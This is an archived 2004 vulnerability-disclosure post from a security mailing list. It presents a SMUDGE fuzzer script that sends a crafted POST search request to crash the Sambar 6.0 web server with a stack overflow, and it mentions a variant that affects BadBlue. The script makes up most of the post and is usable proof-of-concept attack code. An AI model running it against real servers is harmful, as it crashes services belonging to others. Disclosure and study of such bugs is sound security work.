Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Sambar 6.0 stack overflow
From: ned <nd () felinemenace org>
Date: Fri, 6 Feb 2004 17:35:30 -0800 (PST)
Hi lists,
The following SMUDGE (http://felinemenace.org/~nd/SMUDGE) script will 
cause a (difficult to exploit) stack overflow in a default set up of the 
Sambar web server.

--- start script
# http://felinemenace.org/~nd/SMUDGE
# Sambar script (c) nd () felinemenace org
from SMUDGE import *
import sys
sm = SMUDGE(1)

sm.setname("SambarOverflow")

sm.plain("POST /search/results.stm HTTP/1.1")
sm.addcrlf()
sm.plain("Host: MSUDGEDPU")
sm.addcrlf()
sm.plain("Content-Length: ")
sm.blocksize("postdata")
sm.addcrlf()
sm.addcrlf()
sm.putblock("postdata")
sm.addcrlf()
sm.addcrlf()

sm.newblock("postdata")
sm.updateblock("postdata","spage=0&indexname=docs&query=")
sm.blockvariable("postdata","MEEP")
sm.updateblock("postdata","&style=page")

sm.run("127.0.0.1",80,"topdown","single")
-- end script

A modification of this script will also cause misc expections in the 
BadBlue webserver ;)

- endee


-- 
http://felinemenace.org/~nd

  By Date           By Thread  

Current thread:
  • Sambar 6.0 stack overflow ned (Feb 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]